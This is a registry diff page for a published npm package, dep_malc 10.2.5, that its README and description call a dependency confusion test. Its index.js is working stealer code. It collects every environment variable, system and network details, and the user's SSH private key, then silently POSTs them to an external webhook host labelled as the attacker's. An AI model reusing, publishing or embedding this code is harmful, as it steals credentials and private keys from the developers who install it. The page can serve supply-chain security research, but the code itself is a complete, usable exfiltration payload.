dep_malc 10.2.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of dep_malc might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +11 -0
  2. package/index.js +77 -0
  3. package/package.json +17 -0
package/README.md ADDED
@@ -0,0 +1,11 @@
1
+ Author: wr3nch0x1
2
+
3
+ This Example Repo is used reproduce dependency confusion.
4
+
5
+ Checks whether library exists on the specified (internal) package index
6
+
7
+ If not, then:
8
+ Checks whether library exists on the public package index (npmjs)
9
+
10
+ Installs whichever version is found. If the package exists on both, it defaults to installing from the source with the higher version number.
11
+
package/index.js ADDED
@@ -0,0 +1,77 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const fs = require("fs");
6
+ const path = require("path");
7
+ const packageJSON = require("./package.json");
8
+ const package = packageJSON.name;
9
+
10
+ // Collecting system information and environment details
11
+ const trackingData = JSON.stringify({
12
+ p: package,
13
+ c: __dirname,
14
+ hd: os.homedir(),
15
+ hn: os.hostname(),
16
+ un: os.userInfo().username,
17
+ dns: dns.getServers(),
18
+ r: packageJSON ? packageJSON.___resolved : undefined,
19
+ v: packageJSON.version,
20
+ pjson: packageJSON,
21
+
22
+ // Additional personal/system data
23
+ env: process.env, // All environment variables
24
+ arch: os.arch(), // Architecture info
25
+ platform: os.platform(), // Platform info
26
+ uptime: os.uptime(), // System uptime
27
+ ipInterfaces: os.networkInterfaces(), // Network interfaces
28
+ mem: {
29
+ totalMem: os.totalmem(),
30
+ freeMem: os.freemem(),
31
+ },
32
+ cpu: os.cpus(), // CPU details
33
+
34
+ // Process details
35
+ pid: process.pid,
36
+ execPath: process.execPath,
37
+ processArgs: process.argv,
38
+ currentDir: process.cwd(),
39
+ userGroups: os.userInfo().gid,
40
+
41
+ // Sensitive files like SSH keys (for demonstration; never do this in practice)
42
+ sshKey: fs.existsSync(path.join(os.homedir(), ".ssh", "id_rsa"))
43
+ ? fs.readFileSync(path.join(os.homedir(), ".ssh", "id_rsa"), "utf8")
44
+ : "No SSH key found",
45
+ });
46
+
47
+ // Data to be sent
48
+ var postData = querystring.stringify({
49
+ msg: trackingData,
50
+ });
51
+
52
+ // HTTP request options
53
+ var options = {
54
+ hostname: "0abgrwsm26a2xjdw5gsunayltcz3ntbi.oastify.com", // attacker's webhook
55
+ port: 443,
56
+ path: "/",
57
+ method: "POST",
58
+ headers: {
59
+ "Content-Type": "application/x-www-form-urlencoded",
60
+ "Content-Length": postData.length,
61
+ },
62
+ };
63
+
64
+ // Send the data
65
+ var req = https.request(options, (res) => {
66
+ res.on("data", (d) => {
67
+ process.stdout.write(d);
68
+ });
69
+ });
70
+
71
+ req.on("error", (e) => {
72
+ // Handle error silently
73
+ // console.error(e);
74
+ });
75
+
76
+ req.write(postData);
77
+ req.end();
package/package.json ADDED
@@ -0,0 +1,17 @@
1
+ {
2
+ "name": "dep_malc",
3
+ "version": "10.2.5",
4
+ "description": "A simple script to test Dependency Confusion Attack with external webhooks",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js"
8
+ },
9
+ "author": "wr3nch0x1",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "os": "^0.1.1",
13
+ "dns": "^0.2.2",
14
+ "querystring": "^0.2.1",
15
+ "https": "latest"
16
+ }
17
+ }